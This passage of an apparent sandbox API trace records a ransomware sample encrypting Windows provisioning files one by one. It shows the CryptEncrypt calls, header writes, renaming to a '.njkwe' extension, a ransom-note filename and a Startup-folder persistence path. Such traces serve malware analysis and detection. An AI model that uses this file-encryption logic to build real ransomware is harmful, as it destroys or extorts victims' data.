[0076.745] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\138__Connections_Cellular_Free Mobile (France)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0076.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\138__Connections_Cellular_Free Mobile (France)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\138__connections_cellular_free mobile (france)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\138__Connections_Cellular_Free Mobile (France)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\138__connections_cellular_free mobile (france)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.746] GetProcessHeap () returned 0xbe0000 [0076.746] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.746] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9058f44f, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9058f44f, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9058f44f, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2ce, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="139__Connections_Cellular_Orange (France)_i0$(__MVID)@WAP.provxml", cAlternateFileName="139__C~1.PRO")) returned 1 [0076.746] lstrcmpiW (lpString1="139__Connections_Cellular_Orange (France)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.746] lstrcmpiW (lpString1="139__Connections_Cellular_Orange (France)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.746] lstrcmpiW (lpString1="139__Connections_Cellular_Orange (France)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.746] lstrcmpiW (lpString1="139__Connections_Cellular_Orange (France)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.746] lstrcmpiW (lpString1="139__Connections_Cellular_Orange (France)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.746] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\139__Connections_Cellular_Orange (France)_i0$(__MVID)@WAP.provxml") returned 159 [0076.746] StrStrIW (lpFirst="139__Connections_Cellular_Orange (France)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.746] lstrcmpW (lpString1="139__Connections_Cellular_Orange (France)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.746] lstrcmpW (lpString1="139__Connections_Cellular_Orange (France)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.746] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\139__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.746] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\139__Connections_Cellular_Orange (France)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\139__connections_cellular_orange (france)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.746] GetTickCount () returned 0x1153862 [0076.746] GetTickCount () returned 0x1153862 [0076.746] GetTickCount () returned 0x1153862 [0076.746] GetTickCount () returned 0x1153862 [0076.747] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.747] GetProcessHeap () returned 0xbe0000 [0076.747] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.747] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2ce, lpOverlapped=0x0) returned 1 [0076.750] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.750] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2ce, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2ce, lpOverlapped=0x0) returned 1 [0076.750] GetProcessHeap () returned 0xbe0000 [0076.750] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.750] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.751] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.751] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.751] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.751] CloseHandle (hObject=0x43c) returned 1 [0076.751] GetProcessHeap () returned 0xbe0000 [0076.751] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.751] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\139__Connections_Cellular_Orange (France)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0076.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\139__Connections_Cellular_Orange (France)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\139__connections_cellular_orange (france)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\139__Connections_Cellular_Orange (France)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\139__connections_cellular_orange (france)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.752] GetProcessHeap () returned 0xbe0000 [0076.752] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.752] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9013ce1d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9013ce1d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9013ce1d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="13__Connections_Cellular_Optus (Australia)_i4$(__MVID)@WAP.provxml", cAlternateFileName="13__CO~1.PRO")) returned 1 [0076.752] lstrcmpiW (lpString1="13__Connections_Cellular_Optus (Australia)_i4$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.752] lstrcmpiW (lpString1="13__Connections_Cellular_Optus (Australia)_i4$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.752] lstrcmpiW (lpString1="13__Connections_Cellular_Optus (Australia)_i4$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.752] lstrcmpiW (lpString1="13__Connections_Cellular_Optus (Australia)_i4$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.752] lstrcmpiW (lpString1="13__Connections_Cellular_Optus (Australia)_i4$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.752] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\13__Connections_Cellular_Optus (Australia)_i4$(__MVID)@WAP.provxml") returned 160 [0076.752] StrStrIW (lpFirst="13__Connections_Cellular_Optus (Australia)_i4$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.752] lstrcmpW (lpString1="13__Connections_Cellular_Optus (Australia)_i4$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.752] lstrcmpW (lpString1="13__Connections_Cellular_Optus (Australia)_i4$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.752] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\13__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.752] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\13__Connections_Cellular_Optus (Australia)_i4$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\13__connections_cellular_optus (australia)_i4$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.752] GetTickCount () returned 0x1153871 [0076.752] GetTickCount () returned 0x1153871 [0076.752] GetTickCount () returned 0x1153871 [0076.752] GetTickCount () returned 0x1153871 [0076.752] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.753] GetProcessHeap () returned 0xbe0000 [0076.753] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.753] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c6, lpOverlapped=0x0) returned 1 [0076.776] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.776] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c6, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c6, lpOverlapped=0x0) returned 1 [0076.776] GetProcessHeap () returned 0xbe0000 [0076.776] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.777] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.777] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.777] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.777] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.777] CloseHandle (hObject=0x43c) returned 1 [0076.777] GetProcessHeap () returned 0xbe0000 [0076.777] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.777] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\13__Connections_Cellular_Optus (Australia)_i4$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0076.777] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\13__Connections_Cellular_Optus (Australia)_i4$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\13__connections_cellular_optus (australia)_i4$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\13__Connections_Cellular_Optus (Australia)_i4$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\13__connections_cellular_optus (australia)_i4$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.778] GetProcessHeap () returned 0xbe0000 [0076.778] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.778] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9058f44f, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9058f44f, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9058f44f, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x34e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="140__Connections_Cellular_Orange (France)_i1$(__MVID)@WAP.provxml", cAlternateFileName="140__C~1.PRO")) returned 1 [0076.778] lstrcmpiW (lpString1="140__Connections_Cellular_Orange (France)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.778] lstrcmpiW (lpString1="140__Connections_Cellular_Orange (France)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.778] lstrcmpiW (lpString1="140__Connections_Cellular_Orange (France)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.778] lstrcmpiW (lpString1="140__Connections_Cellular_Orange (France)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.778] lstrcmpiW (lpString1="140__Connections_Cellular_Orange (France)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.778] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\140__Connections_Cellular_Orange (France)_i1$(__MVID)@WAP.provxml") returned 159 [0076.778] StrStrIW (lpFirst="140__Connections_Cellular_Orange (France)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.778] lstrcmpW (lpString1="140__Connections_Cellular_Orange (France)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.778] lstrcmpW (lpString1="140__Connections_Cellular_Orange (France)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.778] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\140__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.778] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\140__Connections_Cellular_Orange (France)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\140__connections_cellular_orange (france)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.778] GetTickCount () returned 0x1153881 [0076.778] GetTickCount () returned 0x1153881 [0076.778] GetTickCount () returned 0x1153881 [0076.778] GetTickCount () returned 0x1153881 [0076.778] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.779] GetProcessHeap () returned 0xbe0000 [0076.779] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.779] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x34e, lpOverlapped=0x0) returned 1 [0076.781] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcb2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.781] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x34e, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x34e, lpOverlapped=0x0) returned 1 [0076.782] GetProcessHeap () returned 0xbe0000 [0076.782] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.782] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.782] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.782] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.782] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.782] CloseHandle (hObject=0x43c) returned 1 [0076.782] GetProcessHeap () returned 0xbe0000 [0076.782] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.782] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\140__Connections_Cellular_Orange (France)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0076.782] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\140__Connections_Cellular_Orange (France)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\140__connections_cellular_orange (france)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\140__Connections_Cellular_Orange (France)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\140__connections_cellular_orange (france)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.783] GetProcessHeap () returned 0xbe0000 [0076.783] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.783] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9058f44f, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9058f44f, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9058f44f, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x356, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="141__Connections_Cellular_Orange (France)_i2$(__MVID)@WAP.provxml", cAlternateFileName="141__C~1.PRO")) returned 1 [0076.783] lstrcmpiW (lpString1="141__Connections_Cellular_Orange (France)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.783] lstrcmpiW (lpString1="141__Connections_Cellular_Orange (France)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.783] lstrcmpiW (lpString1="141__Connections_Cellular_Orange (France)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.783] lstrcmpiW (lpString1="141__Connections_Cellular_Orange (France)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.783] lstrcmpiW (lpString1="141__Connections_Cellular_Orange (France)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.783] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\141__Connections_Cellular_Orange (France)_i2$(__MVID)@WAP.provxml") returned 159 [0076.783] StrStrIW (lpFirst="141__Connections_Cellular_Orange (France)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.783] lstrcmpW (lpString1="141__Connections_Cellular_Orange (France)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.783] lstrcmpW (lpString1="141__Connections_Cellular_Orange (France)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.783] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\141__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.783] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\141__Connections_Cellular_Orange (France)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\141__connections_cellular_orange (france)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.786] GetTickCount () returned 0x1153891 [0076.786] GetTickCount () returned 0x1153891 [0076.786] GetTickCount () returned 0x1153891 [0076.786] GetTickCount () returned 0x1153891 [0076.786] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.787] GetProcessHeap () returned 0xbe0000 [0076.787] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.787] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x356, lpOverlapped=0x0) returned 1 [0076.792] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcaa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.792] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x356, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x356, lpOverlapped=0x0) returned 1 [0076.792] GetProcessHeap () returned 0xbe0000 [0076.792] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.792] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.792] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, 